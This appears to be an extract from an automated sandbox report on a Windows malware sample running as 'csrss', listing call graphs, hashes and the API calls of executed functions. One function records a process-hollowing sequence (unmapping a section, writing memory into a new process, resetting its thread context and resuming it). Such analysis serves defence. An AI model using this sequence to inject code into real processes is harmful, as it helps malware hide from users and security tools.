__invoke_watson 1083->1084 1085 696155 _strcpy_s 6 API calls 1084->1085 1086 696bbf __invoke_watson _strlen 1084->1086 1085->1086 1089 69d20d __NMSG_WRITE 6 API calls 1086->1089 1092 696c02 __invoke_watson 1086->1092 1087 69d199 _strcat_s 6 API calls 1088 696c28 __invoke_watson 1087->1088 1090 69d199 _strcat_s 6 API calls 1088->1090 1089->1092 1091 696c4d __invoke_watson 1090->1091 1093 69d030 ___crtMessageBoxW 8 API calls 1091->1093 1092->1087 1093->1078

                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                                                                      • Disassembly available
                                                                                                                                                                                                      callgraph 0 Function_006A1E69 1 Function_006949ED 2 Function_006970EC 37 Function_0069592F 2->37 3 Function_006957EE 62 Function_0069571F 3->62 4 Function_0069C2EE 5 Function_006943E0 8 Function_00694A78 5->8 14 Function_00696948 5->14 25 Function_00696950 5->25 6 Function_006C5FE7 6->2 30 Function_00696254 6->30 32 Function_006959A8 6->32 35 Function_006C5FAA 6->35 7 Function_0069E662 8->14 9 Function_00699BFC 12 Function_00695DF0 9->12 10 Function_0069C1FC 10->0 49 Function_006A1E88 10->49 11 Function_00695AF1 11->62 13 Function_00695848 27 Function_0069B255 13->27 13->30 41 Function_00695926 13->41 58 Function_00696299 13->58 61 Function_0069591D 13->61 64 Function_00696610 13->64 15 Function_0069CF4A 16 Function_00699BCC 17 Function_0069C34F 18 Function_0069C4C0 19 Function_00696640 34 Function_00696CAD 19->34 54 Function_00696B02 19->54 19->62 20 Function_0069D2C2 36 Function_00694A2F 20->36 38 Function_0069452F 20->38 21 Function_00694A42 21->37 22 Function_006951D9 23 Function_00694ADD 44 Function_00699ABF 23->44 24 Function_006950D0 39 Function_0069CFA1 25->39 26 Function_0069C550 26->18 53 Function_0069C500 26->53 28 Function_00696155 28->36 28->38 29 Function_00694A55 29->1 29->21 29->36 31 Function_0069C3D6 31->31 32->19 32->37 33 Function_006C6028 33->3 33->6 33->13 33->26 33->29 33->32 33->36 33->38 43 Function_006957BA 33->43 48 Function_006957B4 33->48 52 Function_00696481 33->52 56 Function_00694A87 33->56 60 Function_0069579A 33->60 34->20 34->54 35->2 35->11 35->26 35->30 35->32 35->35 35->37 36->37 37->13 37->43 37->52 37->56 37->62 38->14 38->62 39->39 40 Function_006956A4 40->64 41->44 42 Function_0069C338 42->10 43->62 45 Function_0069D030 45->40 45->62 65 Function_00695716 45->65 46 Function_006962B0 46->4 46->8 46->26 46->42 55 Function_0069C305 46->55 63 Function_0069C31E 46->63 47 Function_0069C333 50 Function_0069D20D 50->36 50->38 51 Function_0069C28C 51->8 51->10 54->5 54->20 54->24 54->28 54->45 54->50 59 Function_0069D199 54->59 55->0 56->1 56->9 56->16 56->23 56->30 56->36 56->58 57 Function_0069B707 57->22 57->30 57->58 59->36 59->38 61->44 62->64 65->40

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 006C5FE7 Relevance: 4.5, APIs: 3, Instructions: 19COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 006C5FF3
                                                                                                                                                                                                        • Part of subcall function 006959A8: __getptd_noexit.LIBCMT ref: 006959AB
                                                                                                                                                                                                        • Part of subcall function 006959A8: __amsg_exit.LIBCMT ref: 006959B8
                                                                                                                                                                                                      • __endthreadex.LIBCMT ref: 006C6003
                                                                                                                                                                                                        • Part of subcall function 006C5FAA: __IsNonwritableInCurrentImage.LIBCMT ref: 006C5FBD
                                                                                                                                                                                                        • Part of subcall function 006C5FAA: __getptd_noexit.LIBCMT ref: 006C5FCD
                                                                                                                                                                                                        • Part of subcall function 006C5FAA: __freeptd.LIBCMT ref: 006C5FD7
                                                                                                                                                                                                        • Part of subcall function 006C5FAA: __XcptFilter.LIBCMT ref: 006C6014
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.2866921685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.2866921685.0000000000824000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.2866921685.0000000000843000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __getptd_noexit$CurrentFilterImageNonwritableXcpt__amsg_exit__endthreadex__freeptd__getptd
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3678608364-0
                                                                                                                                                                                                      • Opcode ID: a89283c4aba3c99d0b47ffbdad6a7f8d104b49c00d8e382c7f34c9978f4e5ab4
                                                                                                                                                                                                      • Instruction ID: d5ace2e70bc2d3c52d8088d9385be9d0b72b17dae02ad738aec28fd26f28fbfb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a89283c4aba3c99d0b47ffbdad6a7f8d104b49c00d8e382c7f34c9978f4e5ab4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65E0ECB5954605DFEB58ABA0C806E7E776AEF48311F20404CF1029B6A2CA75A984DF25
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00694A87 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.2866921685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.2866921685.0000000000824000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.2866921685.0000000000843000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ___sbh_find_block___sbh_free_block
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2610245434-0
                                                                                                                                                                                                      • Opcode ID: 9db0c556acab1491db248113d37050be2404d0ef9ce48b7016d2b94a45aa8b63
                                                                                                                                                                                                      • Instruction ID: d2f168f1c234fbc1eb0db84b56c896eb6ac808ee96d716f7e41c0537d1ba3495
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9db0c556acab1491db248113d37050be2404d0ef9ce48b7016d2b94a45aa8b63
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E501A271945301AADF60BF74AC06F9F3B6EAF00765F10000DF510A6A99CE788A42DA68
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:38.6%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                      Total number of Nodes:39
                                                                                                                                                                                                      Total number of Limit Nodes:7
                                                                                                                                                                                                      execution_graph 497 2800000 500 2800006 497->500 501 2800015 500->501 504 28007a6 501->504 507 28007c1 504->507 505 28007ca CreateToolhelp32Snapshot 506 28007e6 Module32First 505->506 505->507 508 28007f5 506->508 509 2800005 506->509 507->505 507->506 511 2800465 508->511 512 2800490 511->512 513 28004a1 VirtualAlloc 512->513 514 28004d9 512->514 513->514 514->514 515 2a00000 518 2a00630 515->518 517 2a00005 519 2a0064c 518->519 521 2a01577 519->521 524 2a005b0 521->524 527 2a005dc 524->527 525 2a005e2 GetFileAttributesA 525->527 526 2a0061e 527->525 527->526 529 2a00420 527->529 530 2a004f3 529->530 531 2a004fa 530->531 532 2a004ff CreateWindowExA 530->532 531->527 532->531 533 2a00540 PostMessageA 532->533 534 2a0055f 533->534 534->531 536 2a00110 VirtualAlloc GetModuleFileNameA 534->536 537 2a00414 536->537 538 2a0017d CreateProcessA 536->538 537->534 538->537 540 2a0025f VirtualFree VirtualAlloc Wow64GetThreadContext 538->540 540->537 541 2a002a9 ReadProcessMemory 540->541 542 2a002e5 VirtualAllocEx NtWriteVirtualMemory 541->542 543 2a002d5 NtUnmapViewOfSection 541->543 544 2a0033b 542->544 543->542 545 2a00350 NtWriteVirtualMemory 544->545 546 2a0039d WriteProcessMemory Wow64SetThreadContext ResumeThread 544->546 545->544 547 2a003fb ExitProcess 546->547

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 02A00110 Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02A00156
                                                                                                                                                                                                      • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 02A0016C
                                                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,00000000), ref: 02A00255
                                                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02A00270
                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02A00283
                                                                                                                                                                                                      • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 02A0029F
                                                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 02A002C8
                                                                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 02A002E3
                                                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02A00304
                                                                                                                                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 02A0032A
                                                                                                                                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02A00399
                                                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 02A003BF
                                                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 02A003E1
                                                                                                                                                                                                      • ResumeThread.KERNELBASE(00000000), ref: 02A003ED
                                                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 02A00412
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1864488136.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_2a00000_csrss.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 93872480-0
                                                                                                                                                                                                      • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                                                      • Instruction ID: 61c1513f5b4bf46196b99562dba816fc59e20163065d81e08456b919d33f2010
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BBB1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D771AE41CF94
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 02A00420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 15 2a00420-2a004f8 17 2a004fa 15->17 18 2a004ff-2a0053c CreateWindowExA 15->18 19 2a005aa-2a005ad 17->19 20 2a00540-2a00558 PostMessageA 18->20 21 2a0053e 18->21 22 2a0055f-2a00563 20->22 21->19 22->19 23 2a00565-2a00579 22->23 23->19 25 2a0057b-2a00582 23->25 26 2a00584-2a00588 25->26 27 2a005a8 25->27 26->27 28 2a0058a-2a00591 26->28 27->22 28->27 29 2a00593-2a00597 call 2a00110 28->29 31 2a0059c-2a005a5 29->31 31->27
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02A00533
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1864488136.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_2a00000_csrss.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateWindow
                                                                                                                                                                                                      • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                                                                                      • API String ID: 716092398-2341455598
                                                                                                                                                                                                      • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                      • Instruction ID: 85ef6240119b0a7a85ce1aed29c82a2317a0ab1efb592623d12668c26a7c467b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7511870D08388DAEB11CBE8D889BDDBFB2AF15708F144058D5447F2C6C7BA5658CB66
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 02A005B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 32 2a005b0-2a005d5 33 2a005dc-2a005e0 32->33 34 2a005e2-2a005f5 GetFileAttributesA 33->34 35 2a0061e-2a00621 33->35 36 2a00613-2a0061c 34->36 37 2a005f7-2a005fe 34->37 36->33 37->36 38 2a00600-2a0060b call 2a00420 37->38 40 2a00610 38->40 40->36
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(apfHQ), ref: 02A005EC
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1864488136.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_2a00000_csrss.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                      • String ID: apfHQ$o
                                                                                                                                                                                                      • API String ID: 3188754299-2999369273
                                                                                                                                                                                                      • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                      • Instruction ID: 53fbac7c3438d5f57349e7086dfe9e1dcc4da2f8e8a3cba8649fc3d2a54c0845
                                                                                                                                                                                                      • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA011E70C0425CEEDB10DBD8D5983EEBFB5AF51308F188099C4092B281D7B69B58CBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 028007A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 41 28007a6-28007bf 42 28007c1-28007c3 41->42 43 28007c5 42->43 44 28007ca-28007d6 CreateToolhelp32Snapshot 42->44 43->44 45 28007e6-28007f3 Module32First 44->45 46 28007d8-28007de 44->46 47 28007f5-28007f6 call 2800465 45->47 48 28007fc-2800804 45->48 46->45 51 28007e0-28007e4 46->51 52 28007fb 47->52 51->42 51->45 52->48
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 028007CE
                                                                                                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 028007EE
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1864389783.0000000002800000.00000040.00000020.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_2800000_csrss.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3833638111-0
                                                                                                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                      • Instruction ID: be01d4a918399c8952a579c8c8483f2483dff34137024390c573a0f9b67e9ebe
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46F0C23D1007146BD7603AB99CCCB6F76E8AF49629F100128E646D10C0DB75F8054A62
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 02800465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 54 2800465-280049f call 2800778 57 28004a1-28004d4 VirtualAlloc call 28004f2 54->57 58 28004ed 54->58 60 28004d9-28004eb 57->60 58->58 60->58
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 028004B6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1864389783.0000000002800000.00000040.00000020.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_2800000_csrss.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                      • Instruction ID: 30761b51d0ca16642a74d735280d2ba20f602e0f6608f727ec4f43f862acb4ed
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69113C79A40208EFDB41DF98C985E98BBF5AF08350F05C094F9489B362D775EA90DF81
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:14.9%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                      Total number of Nodes:27
                                                                                                                                                                                                      Total number of Limit Nodes:0

                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                                                                      • Disassembly available
                                                                                                                                                                                                      callgraph 0 Function_006A1E69 1 Function_006949ED 2 Function_006970EC 37 Function_0069592F 2->37 3 Function_006957EE 62 Function_0069571F 3->62 4 Function_0069C2EE 5 Function_006943E0 8 Function_00694A78 5->8 14 Function_00696948 5->14 25 Function_00696950 5->25 6 Function_0069E662 7 Function_006C5FE7 7->2 30 Function_00696254 7->30 32 Function_006959A8 7->32 35 Function_006C5FAA 7->35 8->14 9 Function_00699BFC 12 Function_00695DF0 9->12 10 Function_0069C1FC 10->0 49 Function_006A1E88 10->49 11 Function_00695AF1 11->62 13 Function_00695848 27 Function_0069B255 13->27 13->30 41 Function_00695926 13->41 58 Function_00696299 13->58 61 Function_0069591D 13->61 64 Function_00696610 13->64 15 Function_0069CF4A 16 Function_00699BCC 17 Function_0069C34F 18 Function_0069C4C0 19 Function_00696640 34 Function_00696CAD 19->34 54 Function_00696B02 19->54 19->62 20 Function_0069D2C2 36 Function_00694A2F 20->36 38 Function_0069452F 20->38 21 Function_00694A42 21->37 22 Function_006951D9 23 Function_00694ADD 44 Function_00699ABF 23->44 24 Function_006950D0 39 Function_0069CFA1 25->39 26 Function_0069C550 26->18 53 Function_0069C500 26->53 28 Function_00696155 28->36 28->38 29 Function_00694A55 29->1 29->21 29->36 31 Function_0069C3D6 31->31 32->19 32->37 33 Function_006C6028 33->3 33->7 33->13 33->26 33->29 33->32 33->33 33->36 33->38 43 Function_006957BA 33->43 48 Function_006957B4 33->48 52 Function_00696481 33->52 56 Function_00694A87 33->56 60 Function_0069579A 33->60 34->20 34->54 35->2 35->11 35->26 35->30 35->32 35->35 35->37 36->37 37->13 37->43 37->52 37->56 37->62 38->14 38->62 39->39 40 Function_006956A4 40->64 41->44 42 Function_0069C338 42->10 43->62 45 Function_0069D030 45->40 45->62 65 Function_00695716 45->65 46 Function_006962B0 46->4 46->8 46->26 46->42 55 Function_0069C305 46->55 63 Function_0069C31E 46->63 47 Function_0069C333 50 Function_0069D20D 50->36 50->38 51 Function_0069C28C 51->8 51->10 54->5 54->20 54->24 54->28 54->45 54->50 59 Function_0069D199 54->59 55->0 56->1 56->9 56->16 56->23 56->30 56->36 56->58 57 Function_0069B707 57->22 57->30 57->58 59->36 59->38 61->44 62->64 65->40

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 006C5FE7 Relevance: 4.5, APIs: 3, Instructions: 19COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 006C5FF3
                                                                                                                                                                                                        • Part of subcall function 006959A8: __getptd_noexit.LIBCMT ref: 006959AB
                                                                                                                                                                                                        • Part of subcall function 006959A8: __amsg_exit.LIBCMT ref: 006959B8
                                                                                                                                                                                                      • __endthreadex.LIBCMT ref: 006C6003
                                                                                                                                                                                                        • Part of subcall function 006C5FAA: __IsNonwritableInCurrentImage.LIBCMT ref: 006C5FBD
                                                                                                                                                                                                        • Part of subcall function 006C5FAA: __getptd_noexit.LIBCMT ref: 006C5FCD
                                                                                                                                                                                                        • Part of subcall function 006C5FAA: __freeptd.LIBCMT ref: 006C5FD7
                                                                                                                                                                                                        • Part of subcall function 006C5FAA: RtlExitUserThread.NTDLL(?,?,006C6008,00000000), ref: 006C5FE0
                                                                                                                                                                                                        • Part of subcall function 006C5FAA: __XcptFilter.LIBCMT ref: 006C6014
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.3484645530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.3484645530.0000000000824000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.3484645530.000000000083D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.3484645530.0000000000843000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_csrss.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadUserXcpt__amsg_exit__endthreadex__freeptd__getptd
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1003287236-0
                                                                                                                                                                                                      • Opcode ID: a89283c4aba3c99d0b47ffbdad6a7f8d104b49c00d8e382c7f34c9978f4e5ab4
                                                                                                                                                                                                      • Instruction ID: d5ace2e70bc2d3c52d8088d9385be9d0b72b17dae02ad738aec28fd26f28fbfb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a89283c4aba3c99d0b47ffbdad6a7f8d104b49c00d8e382c7f34c9978f4e5ab4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65E0ECB5954605DFEB58ABA0C806E7E776AEF48311F20404CF1029B6A2CA75A984DF25
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 00694A78 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 006999D2
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006999E7
                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(006D9C6C), ref: 006999F2
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00699A0E
                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00699A15
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.3484645530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.3484645530.0000000000824000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.3484645530.000000000083D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.3484645530.0000000000843000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_csrss.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                                                                      • Opcode ID: 5e4f057abdc76eb51c15de7ff52c5ade2ab544b117bf26ad20e1fd5a877e97fd
                                                                                                                                                                                                      • Instruction ID: dcde4617195335d5d3c577808627ec0208f30a12f7e2c262b8b14ad4a69ab474
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e4f057abdc76eb51c15de7ff52c5ade2ab544b117bf26ad20e1fd5a877e97fd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F021E0B4902305DFCB91DF69FD856447BA9FB88360F10681AF509833A0EFB059828F35
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00694A87 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 102 694a87-694a98 call 696254 105 694a9a-694aa1 102->105 106 694b0f-694b14 call 696299 102->106 107 694aa3-694abb call 699b99 call 699bcc 105->107 108 694ae6 105->108 120 694abd-694ac5 call 699bfc 107->120 121 694ac6-694ad6 call 694add 107->121 110 694ae7-694af7 HeapFree 108->110 110->106 113 694af9-694b0e call 694a2f GetLastError call 6949ed 110->113 113->106 120->121 121->106 127 694ad8-694adb 121->127 127->110
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___sbh_find_block.LIBCMT ref: 00694AB0
                                                                                                                                                                                                      • ___sbh_free_block.LIBCMT ref: 00694ABF
                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,0081B8C0,0000000C,00695999,00000000,?,?,006959B0,?,006C5FF8,0081C690,0000000C,006C60AA,?,00000000), ref: 00694AEF
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,006959B0,?,006C5FF8,0081C690,0000000C,006C60AA,?,00000000), ref: 00694B00
                                                                                                                                                                                                      Memory Dump Source
